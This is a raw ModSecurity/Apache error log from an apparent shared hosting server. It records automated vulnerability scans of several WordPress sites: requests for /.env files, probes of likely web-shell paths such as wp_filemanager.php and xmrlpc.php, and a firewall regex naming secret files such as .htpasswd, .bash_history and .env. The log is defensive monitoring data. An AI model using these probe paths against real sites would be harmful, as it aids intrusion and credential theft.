[Tue May 26 17:03:55.179992 2026] [security2:error] [pid 851641:tid 851827] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/js/"] [unique_id "ahWFIxp8QSN2510avp4nfQAAADg"]
[Tue May 26 17:03:55.585058 2026] [security2:error] [pid 851641:tid 851777] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFIxp8QSN2510avp4nkAAAAAY"]
[Tue May 26 17:03:55.585082 2026] [security2:error] [pid 851641:tid 851777] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFIxp8QSN2510avp4nkAAAAAY"]
[Tue May 26 17:03:55.585810 2026] [security2:error] [pid 851641:tid 851783] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/woocommerce/assets/js/"] [unique_id "ahWFIxp8QSN2510avp4njgAAAAw"]
[Tue May 26 17:03:55.963171 2026] [security2:error] [pid 851641:tid 851876] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFIxp8QSN2510avp4nnQAAAGk"]
[Tue May 26 17:03:55.963203 2026] [security2:error] [pid 851641:tid 851876] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFIxp8QSN2510avp4nnQAAAGk"]
[Tue May 26 17:03:55.963871 2026] [security2:error] [pid 851641:tid 851823] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/woocommerce/"] [unique_id "ahWFIxp8QSN2510avp4nmwAAADQ"]
[Tue May 26 17:03:56.123272 2026] [security2:error] [pid 851641:tid 851790] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFIxp8QSN2510avp4nlgAAABM"]
[Tue May 26 17:03:56.138231 2026] [security2:error] [pid 851641:tid 851846] [client 72.14.147.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFJBp8QSN2510avp4npwAAAEs"]
[Tue May 26 17:03:56.585914 2026] [security2:error] [pid 851641:tid 851882] [client 138.199.19.160:48718] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFJBp8QSN2510avp4nsgAAAG8"]
[Tue May 26 17:03:56.585945 2026] [security2:error] [pid 851641:tid 851882] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFJBp8QSN2510avp4nsgAAAG8"]
[Tue May 26 17:03:57.022014 2026] [security2:error] [pid 851641:tid 851883] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "christinaspromotions.com"] [uri "/wp-admin/network/index.php"] [unique_id "ahWFJBp8QSN2510avp4ntgAAAHA"]
[Tue May 26 17:03:57.965328 2026] [security2:error] [pid 851641:tid 851843] [client 138.199.19.160:46054] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "christinaspromotions.com"] [uri "/wp-admin/network/index.php"] [unique_id "ahWFJRp8QSN2510avp4nygAAAEg"]
[Tue May 26 17:03:58.332505 2026] [security2:error] [pid 851641:tid 851837] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFJRp8QSN2510avp4n0AAAAEI"]
[Tue May 26 17:03:58.740097 2026] [security2:error] [pid 851641:tid 851841] [client 138.199.19.160:46054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.19.199.138.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWFJhp8QSN2510avp4n3AAAAEY"]
[Tue May 26 17:03:58.740327 2026] [security2:error] [pid 851641:tid 851841] [client 138.199.19.160:46054] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWFJhp8QSN2510avp4n3AAAAEY"]
[Tue May 26 17:03:59.067273 2026] [security2:error] [pid 851641:tid 851807] [client 72.14.147.208:52426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ucdc.co.in"] [uri "/api/.env"] [unique_id "ahWFJxp8QSN2510avp4n_AAAACQ"]
[Tue May 26 17:03:59.069982 2026] [security2:error] [pid 851641:tid 851885] [client 72.14.147.208:52470] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFJxp8QSN2510avp4n-gAAAHI"]
[Tue May 26 17:03:59.073112 2026] [security2:error] [pid 851641:tid 851799] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "christinaspromotions.com"] [uri "/wp-admin/user/index.php"] [unique_id "ahWFJhp8QSN2510avp4n9wAAABw"]
[Tue May 26 17:03:59.078501 2026] [security2:error] [pid 851641:tid 851889] [client 72.14.147.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFJxp8QSN2510avp4oAgAAAHY"]
[Tue May 26 17:03:59.079092 2026] [security2:error] [pid 851641:tid 851800] [client 72.14.147.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFJxp8QSN2510avp4oBAAAAB0"]
[Tue May 26 17:03:59.079706 2026] [security2:error] [pid 851641:tid 851886] [client 72.14.147.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFJxp8QSN2510avp4oAwAAAHM"]
[Tue May 26 17:03:59.135180 2026] [security2:error] [pid 851641:tid 851793] [client 72.14.147.208:52420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ucdc.co.in"] [uri "/backend/.env"] [unique_id "ahWFJxp8QSN2510avp4oBwAAABY"]
[Tue May 26 17:03:59.135512 2026] [security2:error] [pid 851641:tid 851846] [client 72.14.147.208:52360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ucdc.co.in"] [uri "/.env"] [unique_id "ahWFJxp8QSN2510avp4oCgAAAEs"]
[Tue May 26 17:03:59.140299 2026] [security2:error] [pid 851641:tid 851819] [client 72.14.147.208:52438] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFJxp8QSN2510avp4oDgAAADA"]
[Tue May 26 17:03:59.149832 2026] [security2:error] [pid 851641:tid 851877] [client 72.14.147.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFJxp8QSN2510avp4oEwAAAGo"]
[Tue May 26 17:03:59.173371 2026] [security2:error] [pid 851641:tid 851861] [client 72.14.147.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFJxp8QSN2510avp4oFAAAAFo"]
[Tue May 26 17:03:59.175735 2026] [security2:error] [pid 851641:tid 851836] [client 72.14.147.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFJxp8QSN2510avp4oFQAAAEE"]
[Tue May 26 17:03:59.762790 2026] [security2:error] [pid 851641:tid 851854] [client 138.199.19.160:46064] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "christinaspromotions.com"] [uri "/wp-admin/user/index.php"] [unique_id "ahWFJxp8QSN2510avp4oIgAAAFM"]
[Tue May 26 17:03:59.838953 2026] [security2:error] [pid 851641:tid 851831] [client 114.119.129.218:64353] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/upload/omr/420190299.pdf"] [unique_id "ahWFJxp8QSN2510avp4oJgAAADw"], referer: https://www.ucdc.co.in/upload/omr/?C=D%3BO%3DA
[Tue May 26 17:03:59.951796 2026] [security2:error] [pid 851641:tid 851792] [client 138.199.19.160:46064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.19.199.138.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWFJxp8QSN2510avp4oLQAAABU"]
[Tue May 26 17:03:59.951898 2026] [security2:error] [pid 851641:tid 851792] [client 138.199.19.160:46064] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWFJxp8QSN2510avp4oLQAAABU"]
[Tue May 26 17:04:00.069959 2026] [security2:error] [pid 851641:tid 851865] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFJxp8QSN2510avp4oIQAAAF4"]
[Tue May 26 17:04:00.358016 2026] [security2:error] [pid 851641:tid 851822] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/wp-content/index.php"] [unique_id "ahWFKBp8QSN2510avp4oNgAAADM"]
[Tue May 26 17:04:00.358414 2026] [security2:error] [pid 851641:tid 851858] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/wp-content/"] [unique_id "ahWFKBp8QSN2510avp4oNAAAAFc"]
[Tue May 26 17:04:00.419665 2026] [security2:error] [pid 851641:tid 851806] [client 85.208.96.204:42392] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-10-14/list/"] [unique_id "ahWFKBp8QSN2510avp4oNwAAACM"]
[Tue May 26 17:04:00.419800 2026] [security2:error] [pid 851641:tid 851806] [client 85.208.96.204:42392] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-10-14/list/"] [unique_id "ahWFKBp8QSN2510avp4oNwAAACM"]
[Tue May 26 17:04:00.682244 2026] [security2:error] [pid 851641:tid 851819] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/index.php"] [unique_id "ahWFKBp8QSN2510avp4oRAAAADA"]
[Tue May 26 17:04:00.682654 2026] [security2:error] [pid 851641:tid 851884] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/"] [unique_id "ahWFKBp8QSN2510avp4oQgAAAHE"]
[Tue May 26 17:04:01.080384 2026] [security2:error] [pid 851641:tid 851888] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahWFKRp8QSN2510avp4oawAAAHU"]
[Tue May 26 17:04:01.080770 2026] [security2:error] [pid 851641:tid 851836] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/wp-content/themes/"] [unique_id "ahWFKRp8QSN2510avp4oaQAAAEE"]
[Tue May 26 17:04:01.545050 2026] [autoindex:error] [pid 851641:tid 851891] [client 138.199.19.160:48718] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-admin/includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:04:01.545894 2026] [security2:error] [pid 851641:tid 851891] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFKRp8QSN2510avp4oeQAAAHg"]
[Tue May 26 17:04:01.884986 2026] [security2:error] [pid 851641:tid 851794] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "christinaspromotions.com"] [uri "/wp-admin/index.php"] [unique_id "ahWFKRp8QSN2510avp4ofQAAABc"]
[Tue May 26 17:04:02.638248 2026] [security2:error] [pid 851641:tid 851865] [client 138.199.19.160:46068] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "christinaspromotions.com"] [uri "/wp-admin/index.php"] [unique_id "ahWFKhp8QSN2510avp4okQAAAF4"]
[Tue May 26 17:04:02.664278 2026] [security2:error] [pid 851641:tid 851871] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFKhp8QSN2510avp4oigAAAGQ"]
[Tue May 26 17:04:02.849152 2026] [security2:error] [pid 851641:tid 851806] [client 138.199.19.160:46068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.19.199.138.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWFKhp8QSN2510avp4olgAAACM"]
[Tue May 26 17:04:02.849266 2026] [security2:error] [pid 851641:tid 851806] [client 138.199.19.160:46068] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWFKhp8QSN2510avp4olgAAACM"]
[Tue May 26 17:04:03.377409 2026] [autoindex:error] [pid 851641:tid 851836] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:04:03.378071 2026] [security2:error] [pid 851641:tid 851836] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFKxp8QSN2510avp4opwAAAEE"]
[Tue May 26 17:04:03.378500 2026] [security2:error] [pid 851641:tid 851779] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-content/upgrade/"] [unique_id "ahWFKxp8QSN2510avp4opQAAAAg"]
[Tue May 26 17:04:03.680347 2026] [security2:error] [pid 851641:tid 851890] [client 4.201.75.230:29007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWFKxp8QSN2510avp4orgAAAHc"]
[Tue May 26 17:04:03.680513 2026] [security2:error] [pid 851641:tid 851890] [client 4.201.75.230:29007] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWFKxp8QSN2510avp4orgAAAHc"]
[Tue May 26 17:04:04.106965 2026] [security2:error] [pid 851641:tid 851892] [client 4.201.75.230:42860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/lang/es.php"] [unique_id "ahWFLBp8QSN2510avp4o9wAAAHk"]
[Tue May 26 17:04:04.107136 2026] [security2:error] [pid 851641:tid 851892] [client 4.201.75.230:42860] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/lang/es.php"] [unique_id "ahWFLBp8QSN2510avp4o9wAAAHk"]
[Tue May 26 17:04:04.575533 2026] [security2:error] [pid 851641:tid 851859] [client 4.201.75.230:34370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/core/init.php"] [unique_id "ahWFLBp8QSN2510avp4pCwAAAFg"]
[Tue May 26 17:04:04.575647 2026] [security2:error] [pid 851641:tid 851859] [client 4.201.75.230:34370] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/core/init.php"] [unique_id "ahWFLBp8QSN2510avp4pCwAAAFg"]
[Tue May 26 17:04:04.788150 2026] [security2:error] [pid 851641:tid 851790] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFLBp8QSN2510avp4pAwAAABM"]
[Tue May 26 17:04:04.981337 2026] [security2:error] [pid 851641:tid 851798] [client 4.201.75.230:23557] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahWFLBp8QSN2510avp4pFQAAABs"]
[Tue May 26 17:04:04.981438 2026] [security2:error] [pid 851641:tid 851798] [client 4.201.75.230:23557] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahWFLBp8QSN2510avp4pFQAAABs"]
[Tue May 26 17:04:05.305032 2026] [security2:error] [pid 851641:tid 851857] [client 5.255.99.53:39878] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFLRp8QSN2510avp4pFgAAAFY"]
[Tue May 26 17:04:05.465502 2026] [security2:error] [pid 851641:tid 851865] [client 4.201.75.230:21740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/xmrlpc.php"] [unique_id "ahWFLRp8QSN2510avp4pJQAAAF4"]
[Tue May 26 17:04:05.465602 2026] [security2:error] [pid 851641:tid 851865] [client 4.201.75.230:21740] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/xmrlpc.php"] [unique_id "ahWFLRp8QSN2510avp4pJQAAAF4"]
[Tue May 26 17:04:06.100954 2026] [security2:error] [pid 851641:tid 851785] [client 4.201.75.230:33557] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/class.php"] [unique_id "ahWFLhp8QSN2510avp4pNQAAAA4"]
